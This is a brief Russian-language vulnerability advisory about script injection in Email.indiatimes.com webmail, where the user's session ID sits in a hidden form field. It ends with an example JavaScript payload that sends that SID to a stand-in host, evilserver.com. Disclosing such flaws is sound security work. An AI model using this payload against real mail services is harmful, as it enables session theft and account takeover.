Email.indiatimes.com - популярная система Web почты от газеты 'The Times of India'. Сценарии, используемые на Web сайте, позволяют пользователям вставлять HTML или JavaScript код в почтовые сообщения. Злонамеренный код, вставленный в электронное сообщение, может использоваться для похищения опознавательных мандатов (хотя сайт не использует куки, SID пользователя хранится в поле формы):
<Form name=Rform ...>
<input type=hidden name=SID value="some_random_number:> </form>
Этот SID - единственный маркер, использующийся для подтверждения подлинности пользователя).
Пример:
<script>
self.location.href="http://evilserver.com/evil.cgi?SID="+Rform.SID.value
</script>
